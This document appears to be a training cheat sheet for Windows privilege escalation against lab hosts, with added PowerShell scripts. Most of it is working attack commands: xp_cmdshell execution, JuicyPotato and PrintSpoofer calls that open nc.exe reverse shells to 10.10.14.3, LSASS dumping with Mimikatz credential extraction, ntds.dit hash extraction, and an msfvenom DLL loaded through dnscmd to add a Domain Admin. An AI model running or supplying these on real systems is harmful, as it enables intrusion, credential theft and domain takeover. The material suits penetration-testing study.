Handy Commands

1. Connect using mssqlclient.py

Command:

mssqlclient.py sql_dev@10.129.43.30 -windows-auth

Description: Connect to the MSSQL instance with Impacket's mssqlclient.py using Windows (NTLM) authentication for the sql_dev account; drop -windows-auth for a SQL login.

2. Enable xp_cmdshell

Command:

EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

Description: Enable xp_cmdshell. Both sp_configure calls need the sysadmin role (or ALTER SETTINGS); 'show advanced options' must be on before xp_cmdshell is visible to sp_configure.

3. Run OS commands with xp_cmdshell

Command:

xp_cmdshell 'whoami'

Description: Run an OS command through xp_cmdshell. The command executes as the SQL Server service account (or the configured proxy account), so whoami tells you what you actually have.
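
The three MSSQL steps above as one script, added here as an example and not code from the original page: it checks that the login is sysadmin, enables xp_cmdshell only if it is currently off, runs the command, and restores the previous setting. It assumes the instance at 10.129.43.30 is reachable on TCP 1433; Integrated Security needs a Windows/domain logon context (for example runas /netonly), and -User/-Password switch it to a SQL login.

```powershell
# Added example, not from the original page. Assumptions: 10.129.43.30:1433
# is reachable and the login used holds sysadmin.
param(
    [string]$Server   = '10.129.43.30',
    [string]$Command  = 'whoami',
    [string]$User     = '',
    [string]$Password = ''
)

$cs = "Server=$Server;Encrypt=False;"
if ($User) { $cs += "User ID=$User;Password=$Password;" } else { $cs += 'Integrated Security=True;' }

$conn = New-Object System.Data.SqlClient.SqlConnection $cs
$conn.Open()

function Invoke-Scalar([string]$Sql) {
    $cmd = $conn.CreateCommand(); $cmd.CommandText = $Sql
    return $cmd.ExecuteScalar()
}
function Invoke-NonQuery([string]$Sql) {
    $cmd = $conn.CreateCommand(); $cmd.CommandText = $Sql
    [void]$cmd.ExecuteNonQuery()
}

# sp_configure/RECONFIGURE need sysadmin (or ALTER SETTINGS); fail early otherwise.
if ((Invoke-Scalar "SELECT IS_SRVROLEMEMBER('sysadmin')") -ne 1) {
    $conn.Close(); throw 'Login is not sysadmin; cannot reconfigure xp_cmdshell.'
}

# Record the current state; sys.configurations is readable without 'show advanced options'.
$wasEnabled = [int](Invoke-Scalar "SELECT CONVERT(int, value_in_use) FROM sys.configurations WHERE name = 'xp_cmdshell'")
Write-Host "xp_cmdshell enabled before: $wasEnabled"

if ($wasEnabled -ne 1) {
    Invoke-NonQuery "EXEC sp_configure 'show advanced options', 1; RECONFIGURE;"
    Invoke-NonQuery "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"
}

try {
    # xp_cmdshell returns one row per line of output; the final row is NULL.
    $cmd = $conn.CreateCommand()
    $cmd.CommandText = 'EXEC master..xp_cmdshell @c'
    [void]$cmd.Parameters.AddWithValue('@c', $Command)
    $rdr = $cmd.ExecuteReader()
    while ($rdr.Read()) { if (-not $rdr.IsDBNull(0)) { Write-Output $rdr.GetString(0) } }
    $rdr.Close()
}
finally {
    # Restore the previous state so the instance is left as it was found.
    if ($wasEnabled -ne 1) {
        Invoke-NonQuery "EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;"
        Invoke-NonQuery "EXEC sp_configure 'show advanced options', 0; RECONFIGURE;"
    }
    $conn.Close()
}
```

Run it as `.\xp_cmdshell.ps1 -Command 'whoami /priv'` from a domain-joined host, or with `-User sql_dev -Password '...'` for a SQL login. Reading `value_in_use` first is what makes the cleanup in `finally` safe: if xp_cmdshell was already on, the script leaves it on.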

4. Escalate privileges with JuicyPotato

Command:

c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 443 -e cmd.exe" -t *

Description: Escalate to SYSTEM with JuicyPotato. Needs SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege (typical for service accounts such as the MSSQL service); -l is the local COM listener port, -t * tries both CreateProcessWithToken and CreateProcessAsUser. Does not work on Windows 10 1809+/Server 2019+, where PrintSpoofer or RoguePotato are used instead.

5. Escalating privileges with PrintSpoofer

Command:

c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"

Description: Escalate to SYSTEM with PrintSpoofer. Also relies on SeImpersonatePrivilege but abuses the Print Spooler named pipe, so it works on Windows 10 and Server 2016/2019 builds where JuicyPotato fails; the spooler service must be running.

6. Take memory dump with ProcDump

Command:

procdump.exe -accepteula -ma lsass.exe lsass.dmp

Description: Take a full (-ma) memory dump of LSASS with Sysinternals ProcDump. Requires local administrator rights / SeDebugPrivilege; it fails if LSASS runs as a protected process (RunAsPPL) and is commonly flagged by EDR.

7. Extract credentials from LSASS dump using Mimikatz

Command:

sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

Description: Use Mimikatz to extract credentials from the LSASS memory dump offline: sekurlsa::minidump switches Mimikatz to reading the dump file, sekurlsa::logonpasswords then lists the cached logon data.

8. Checking ownership of a file

Command:

dir /q C:\backups\wwwroot\web.config

Description: Check ownership of a file; dir /q adds the owner column to the listing.

9. Taking ownership of a file

Command:

takeown /f C:\backups\wwwroot\web.config

Description: Take ownership of a file (owner becomes the current user). Succeeds only with SeTakeOwnershipPrivilege, which administrators hold by default.

10. Confirm changed ownership of a file

Command:

Get-ChildItem -Path 'C:\backups\wwwroot\web.config' | select name,directory, @{Name="Owner";Expression={(Get-ACL $_.Fullname).Owner}}

Description: Confirm the changed ownership from PowerShell by reading the Owner property of the file's ACL.

11. Modifying a file ACL

Command:

icacls "C:\backups\wwwroot\web.config" /grant htb-student:F

Description: Modify the file ACL to grant htb-student Full control (F). Owning the file is what allows editing its DACL even when the existing entries do not grant you write access.
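
The same ownership and ACL change done with Get-Acl/Set-Acl instead of takeown/icacls, added as an example and not part of the original page. It first checks for SeTakeOwnershipPrivilege, records the ACL before the change, and verifies the owner and the new Full control entry afterwards. The path and principal are the ones used on this page; it assumes the caller is an administrator or otherwise holds the privilege.

```powershell
# Added example, not from the original page. Assumes administrator rights
# (or SeTakeOwnershipPrivilege) and the path/principal used on this page.
param(
    [string]$Path      = 'C:\backups\wwwroot\web.config',
    [string]$Principal = 'htb-student'
)

# takeown/Set-Acl can only change the owner if the token carries
# SeTakeOwnershipPrivilege (or you already own the object). whoami /priv lists
# it even while Disabled; the OS enables it on demand.
if (-not (whoami /priv | Select-String 'SeTakeOwnershipPrivilege')) {
    Write-Warning "SeTakeOwnershipPrivilege not present; the owner change will fail unless you already own $Path"
}

# Record the state before touching anything (equivalent of dir /q + icacls listing).
$before = Get-Acl -Path $Path
Write-Host "Owner before : $($before.Owner)"
$before.Access | ForEach-Object {
    Write-Host ('  {0,-30} {1,-6} {2}' -f $_.IdentityReference, $_.AccessControlType, $_.FileSystemRights)
}

# Step 1: take ownership (takeown /f). Setting the owner to yourself only needs
# SeTakeOwnershipPrivilege; any other owner would need SeRestorePrivilege.
$me  = [System.Security.Principal.WindowsIdentity]::GetCurrent().User
$acl = Get-Acl -Path $Path
$acl.SetOwner($me)
Set-Acl -Path $Path -AclObject $acl

# Step 2: grant Full control (icacls /grant htb-student:F). As owner we may
# write the DACL regardless of what the existing ACEs say.
$rule = New-Object System.Security.AccessControl.FileSystemAccessRule($Principal, 'FullControl', 'Allow')
$acl  = Get-Acl -Path $Path
$acl.AddAccessRule($rule)
Set-Acl -Path $Path -AclObject $acl

# Step 3: verify both changes actually landed.
$after   = Get-Acl -Path $Path
$meName  = $me.Translate([System.Security.Principal.NTAccount]).Value
$granted = $after.Access | Where-Object {
    $_.IdentityReference.Value -like "*\$Principal" -and
    $_.AccessControlType -eq 'Allow' -and
    $_.FileSystemRights -match 'FullControl'
}
Write-Host "Owner after  : $($after.Owner)"
if ($after.Owner -eq $meName -and $granted) {
    Write-Host "OK: ownership taken and FullControl granted to $Principal"
} else {
    Write-Warning 'ACL change did not take effect as expected'
}
```

Keeping the `$before` listing is deliberate: a takeown/icacls change is noisy in file-system auditing (event 4670), and you want the original entries if you need to put them back.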

12. Extract hashes with secretsdump.py

Command:

secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL

Description: Extract hashes offline from a copied ntds.dit using the matching SYSTEM hive as the boot key. The LOCAL target tells secretsdump.py to parse files rather than connect anywhere, so the -hashes option (used only for remote authentication) has no effect here.

13. Copy files with ROBOCOPY

Command:

robocopy /B E:\Windows\NTDS .\ntds ntds.dit

Description: Copy ntds.dit with Robocopy in backup mode (/B), which uses SeBackupPrivilege to read files the ACL would otherwise deny. The live ntds.dit on C: is locked by LSASS, so E: is typically a volume shadow copy exposed as a drive letter.

14. Searching security event logs

Command:

wevtutil qe Security /rd:true /f:text | Select-String "/user"

Description: Search the Security event log for command lines containing "/user" (e.g. net use or runas with a password) from PowerShell; /rd:true reads newest first.

15. Passing credentials to wevtutil

Command:

wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 | findstr "/user"

Description: Query the Security log of a remote host (/r) with explicit credentials (/u and /p), filtering with findstr from cmd.

16. Searching event logs with PowerShell

Command:

Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*' } | Select-Object @{name='CommandLine';expression={ $_.Properties[8].Value }}

Description: Search process creation events (4688) with PowerShell. Properties[8] is the "Process Command Line" field, which is only populated when "Include command line in process creation events" auditing is enabled.
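
A fuller version of the 4688 search above, added as an example and not code from the original page: it pushes the event ID filter into the log API, extends the single "/user" string to a small set of patterns that commonly carry a password, reports the creating account and process for each hit, and warns when command-line auditing is off (the failure mode where Properties[8] is blank for every event). It assumes the caller can read the Security log (Administrators or Event Log Readers); the pattern list is constructed for this example.

```powershell
# Added example, not from the original page. Assumes read access to the
# Security log; patterns below are illustrative, not a complete list.
param(
    [int]    $MaxEvents = 5000,
    [string] $LogName   = 'Security'
)

# Command-line shapes that often carry a cleartext password (constructed list; noisy by design).
$patterns = @(
    '/user:\S+\s+\S+',        # net use / runas ... /user:name password
    '\s-p\s+\S+',             # psexec / wmic style -p password
    'password\s*[:=]\s*\S+'   # key=value style
)
$regex = New-Object System.Text.RegularExpressions.Regex(($patterns -join '|'), 'IgnoreCase')

# 4688 = "A new process has been created". FilterHashtable filters in the
# log API instead of pulling every event into PowerShell first.
$events = @(Get-WinEvent -FilterHashtable @{ LogName = $LogName; Id = 4688 } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue)
if ($events.Count -eq 0) { Write-Warning "No 4688 events in $LogName (is process creation auditing enabled?)"; return }

# Field positions for 4688: [1] SubjectUserName, [5] NewProcessName, [8] CommandLine.
$withCmdline = 0
$hits = foreach ($e in $events) {
    $cmdline = $e.Properties[8].Value
    if ([string]::IsNullOrWhiteSpace($cmdline)) { continue }
    $withCmdline++
    $m = $regex.Match($cmdline)
    if ($m.Success) {
        [pscustomobject]@{
            Time        = $e.TimeCreated
            SubjectUser = $e.Properties[1].Value
            NewProcess  = $e.Properties[5].Value
            Match       = $m.Value
            CommandLine = $cmdline
        }
    }
}

if ($withCmdline -eq 0) {
    Write-Warning "None of $($events.Count) 4688 events carry a command line; enable 'Include command line in process creation events' (ProcessCreationIncludeCmdLine_Enabled)."
}

$hits | Sort-Object Time -Descending | Format-Table -AutoSize -Wrap
```

Expect false positives from the `-p` pattern (for example `nc.exe -p 443`); the point of the `Match` column is to make triage quick rather than to be a precise detector.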

17. Generate malicious DLL

Command:

msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll

Description: Generate a DLL with msfvenom whose exec payload adds netadm to the Domain Admins group. Loaded by the DNS service on a domain controller, it runs as SYSTEM, which has the rights to make that change.

18. Loading a custom DLL with dnscmd

Command:

dnscmd.exe /config /serverlevelplugindll adduser.dll

Description: Register a custom DLL as the DNS server plugin with dnscmd. This writes the ServerLevelPluginDll registry value and requires DnsAdmins membership or equivalent rights on the DNS service; the DLL is loaded only when the service next starts, and its path must be readable by the DNS service account (a local path or UNC share).

19. Finding a user's SID

Command:

wmic useraccount where name="netadm" get sid

Description: Find a user's SID with WMI, e.g. to look for it in the service's security descriptor.

20. Checking permissions on DNS service

Command:

sc.exe sdshow DNS

Description: Show the DNS service's security descriptor in SDDL form; the ACE for your SID (or a group you belong to) needs RP (start) and WP (stop) for the restart below to work.

21. Stopping a service

Command:

sc stop dns

Description: Stop the DNS service. From PowerShell use sc.exe, since sc is an alias for Set-Content there.

22. Starting a service

Command:

sc start dns

Description: Start the DNS service again, which loads the registered plugin DLL. Use sc.exe from PowerShell.

23. Querying a registry key

Command:

reg query \\10.129.43.9\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters

Description: Query the DNS service's Parameters key over the remote registry to confirm the ServerLevelPluginDll value that dnscmd set.
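
A check for the DNS plugin steps above, added as an example and not part of the original page: it resolves the SID for the user (the wmic step), parses the SDDL from sc.exe sdshow instead of eyeballing it, reports whether the current token holds change-config, start and stop rights on the service, and reads ServerLevelPluginDll from the Parameters key (the reg query step). It assumes it runs on the DNS server as the account being checked, since group SIDs are taken from the current token; deny ACEs are not evaluated.

```powershell
# Added example, not from the original page. Run on the DNS server as the
# account whose rights you want to confirm (group SIDs come from the token).
param(
    [string]$Service = 'DNS',
    [string]$User    = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
)

# Service-specific access bits from winsvc.h; GENERIC_ALL (GA) covers all of them.
$SERVICE_CHANGE_CONFIG = 0x0002   # SDDL "DC"
$SERVICE_START         = 0x0010   # SDDL "RP"
$SERVICE_STOP          = 0x0020   # SDDL "WP"
$GENERIC_ALL           = 0x10000000

# User SID (what 'wmic useraccount ... get sid' prints) plus the token's group SIDs,
# because the ACE granting access is usually on a group such as DnsAdmins.
$userSid   = (New-Object System.Security.Principal.NTAccount($User)).Translate([System.Security.Principal.SecurityIdentifier]).Value
$tokenSids = @($userSid) + @([System.Security.Principal.WindowsIdentity]::GetCurrent().Groups | ForEach-Object { $_.Value })
Write-Host "SID for ${User}: $userSid"

# sc.exe sdshow prints the SDDL on one line; parse it into ACEs.
$sddl = (sc.exe sdshow $Service | Where-Object { $_ -match '^\s*[DOGS]:' } | Select-Object -First 1).Trim()
$sd   = New-Object System.Security.AccessControl.RawSecurityDescriptor($sddl)

$allowed = 0
foreach ($ace in $sd.DiscretionaryAcl) {
    if ($ace -isnot [System.Security.AccessControl.CommonAce]) { continue }
    if ($tokenSids -notcontains $ace.SecurityIdentifier.Value) { continue }
    if ($ace.AceType -eq [System.Security.AccessControl.AceType]::AccessAllowed) {
        $allowed = $allowed -bor $ace.AccessMask
    }
}

$hasGA = ($allowed -band $GENERIC_ALL) -ne 0
[pscustomobject]@{
    ChangeConfig = $hasGA -or (($allowed -band $SERVICE_CHANGE_CONFIG) -ne 0)
    Start        = $hasGA -or (($allowed -band $SERVICE_START) -ne 0)
    Stop         = $hasGA -or (($allowed -band $SERVICE_STOP) -ne 0)
} | Format-List

# What 'reg query ...\DNS\Parameters' shows: is a plugin DLL already registered?
$key = "HKLM:\SYSTEM\CurrentControlSet\Services\$Service\Parameters"
$dll = (Get-ItemProperty -Path $key -Name ServerLevelPluginDll -ErrorAction SilentlyContinue).ServerLevelPluginDll
if ($dll) { Write-Warning "ServerLevelPluginDll is set to '$dll'; it loads on the next service start" }
else      { Write-Host 'ServerLevelPluginDll is not set' }
```

If Start/Stop come back false, the dnscmd step may still succeed (it only needs the registry write and DnsAdmins rights) but the DLL will not load until someone else restarts the service, so check this before registering anything.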
